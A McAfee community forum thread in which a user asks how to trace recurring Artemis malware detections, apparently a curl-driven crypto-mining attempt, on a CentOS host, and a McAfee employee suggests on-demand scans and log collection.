cancel
Showing results for 
Search instead for 
Did you mean: 
Highlighted

Malware events triggering frequently on CentOS

Hello Community members

 

We have been seeing a lot of events on one of the Linux host and they all have same details are successfully handled. This is an Artimis detection. I assume curl is trying to execute some commands  however, I'm not sure how to troubleshoot this scenario and get to the root cause of it. As per Virutotal Information, this appears to be crypto Mining related attempt. 

Please advise how can we investigate

- What curl is trying to execute

- Where these jobs are scheduled to run and what are they

Malware.JPG

Labels (3)
3 Replies
McAfee Employee patrakshar
McAfee Employee
Report Inappropriate Content
Message 2 of 4

Re: Malware events triggering frequently on CentOS

The drive from where you are seeing this detection, is it shared with other users?

Once we have deleted the file from the location, and again it is coming back that means there is some other process creating it. If not locally then remotely.

If your Artemis Level for OAS is set as Medium, then trigger an ODS (preferably offline) on that Linux box with same Artemis Level.

Once the ODS is complete, check if you are still seeing the detection from OAS.

Curl is shared library here so there is definitely some other application which is using it to trigger these events.

Re: Malware events triggering frequently on CentOS

Thanks patrakshar

Not sure if its been shared with others
I have validated in SIEM if there are any connections to this server from outside or not however, couldn't find any suspicious connections. They are getting detected \ deleted and there are no pending deletion malware events so would scanning the server offline be still helpful ? These are generating almost every min.

So I was looking for some guidance on how to check curl execution history and some commands which will be helpful to see process is creating it.
McAfee Employee patrakshar
McAfee Employee
Report Inappropriate Content
Message 4 of 4

Re: Malware events triggering frequently on CentOS

Suggestion of offline scanning given considering that the machine is shared with others. If that is not the case then you can directly trigger the ODS.

From the logging side we can only capture what is written within the logs. So if you can share the logs from   opt/isec/ens/threatprevention/var/ location we can check more details.

 

 

More McAfee Tools to Help You
  • How-to: Endpoint Removal Tool
  • Support: Endpoint Security
  • Visit: Business Service Portal
  • More: Search Knowledge Articles
  • ePolicy Orchestrator Support
  • The McAfee ePO Support Center Plug-in is now available in the Software Manager. Follow the instructions in the Product Guide for more.